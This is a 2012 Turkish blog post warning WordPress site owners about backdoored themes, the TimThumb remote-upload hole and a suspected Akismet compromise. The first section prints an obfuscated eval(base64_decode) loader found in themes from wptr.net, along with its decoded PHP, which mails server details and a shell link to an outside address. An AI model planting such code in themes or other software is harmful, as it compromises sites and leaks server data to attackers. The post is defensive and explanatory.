Arkadaşlar yine bir makalemde birlikteyiz :), ilk önce şunu belirtmek isterim ki wordpress sistemi günümüz kodlamasında webmasterların kullanabilecegi en iyi sistemdir.Fakat her sistemde olduğu gibi güvenlik açıkları vardır (çogunu site sahipleri oluşturur). Bu yazımda, 2012 Agustos ayında hacklenmiş siteleri tek tek inceleyerek size olabilecek güvenlik açıklarını listeleyecegim ve tabi ki nasıl kapatılır nasıl bi daha olmaz vs. gibi sorularında cevaplarını verecegim. Şimdi geçelim wordpresste sorunlu ve açıkları olan temalara...
1- wptr.net tema avcısı
Bir kere wptr.net'den tema indirdiyseniz kesinlikle güvenlik açıgı olacaktır.Güvenlik açıgını da wptr.net'de ki uyanık arkadaşlar oluşturuyor. Gerçi ne yaptıklarını bilmeyen kalmadı ama olsun yine de bilgilenmeyen arkadaşlar için uyarımı yapayım. Wptr.net'den indirdiginiz temaların içinde header.php haricinde headers.php de oluyor ve bu dosyanın içindeki kodları base64 ile şifreliyorlar, haliyle kimse bişi anlamıyor, fakat base64 ile şifrelenmiş bu kodları ;
eval(base64_decode("JGtpbWU9ImluZGlyZWxpbWhlbWVuQGdtYWlsLmNvbSI7DQokYmFzbGlrPSJXb3JkUHJlc1MgVGVtYSBTdyBBdmNpc2kgVjMuMCI7DQokRUxfTXVIYU1NZUQ9IkRvc3lhIFlvbHUgOiAiLiRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNl
kırdıgımızda ise aynen şu kodlar çıkıyor ;
z��r�^$kime="indirelimhemen@gmail.com"; $baslik="WordPresS Tema Sw Avcisi V3.0"; $EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."rn"; $EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."rn"; $EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."rn"; $EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."rn"; $EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."rn"; mail($kime, $baslik, $EL_MuHaMMeD);
Yani artık 2012' de wptr.net'in ne yaptıgını söylememize gerek yok, neyse bu konu hakkında pek üzerinde durdum geçiyorum bunu.
2- Timthumb.php
Bildigim kadarıyla timthumb eklentisi ile uzaktan erişilerek serverinize görsel yüklenebiliyor.
Bu tabi ki de normal birşey degil. Buna hangi kodlar sebeb oluyor ? ve nasıl kapatabiliriz ? işte cevap ;
timthumb.php içerisindeki bu kodlar ;
$allowedSites = array (
'flickr.com',
'picasa.com',
'blogger.com',
'wordpress.com',
'img.youtube.com',
'upload.wikimedia.org',
'photobucket.com',
);
sizin serverinize resim yükleyebilmesi için izin verdiginiz siteleri barındırıyor.
Çözüm çok basit... İzin verdiginiz siteleri oradan silin ! ve kodunuz sadece " $allowedSites = array (); " olsun :)
Ayrıca Timtumb kullanan eklentilerin listesine şurdan ulaşabilirsiniz ; http://tny.cz/a864f07b
websitedefender.com' a göre timthumb kullanan temaların listesi : http://tny.cz/82c0c3e2
Ayrıca yabancı bir websitesinde okuduguma göre timthumb bu açıgı kapatmış. Fakat ne kadar dogru bilemem.
Neyse devam edelim...
3- Akismet Açığı
Arkadaşlar kimseden saklayacak degilim samimi söylüyorum, bir warez sitesinde rastladım buna, yabancı bir temaya shell atıp temayı çekmişler, ve site adresini veremiyorum fakat "www.shellatılansite.com/plugins/akismet..." yolu üzerindeydi. Nasıl kapanır neden oldu bilmiyorum fakat dikkatli olmanızı ve eklentiyi bir süreligine durdurmanızı tavsiye ederim. Kodları incelemeye şimdiden başladım bile en kısa sürede yine bloglayanadam.blogspot.com'dan yeni makalemde bu konuya da deginip, açıgın nasıl kapatılacagını yazabilirim.
Şimdilik bu kadar arkadaşlar, yogun işlerimden blogla ilgilenme zamanı bulamıyorum fakat yine özgün makalelerimle aranızda olmaktan çok mutluyum :). Ha bide arada bloguma girmeyi eksik etmeyin hee :)
Kaynak : http://bloglayanadam.blogspot.com/2012/08/wordpress-siteleriniz-icin-guncel-en.html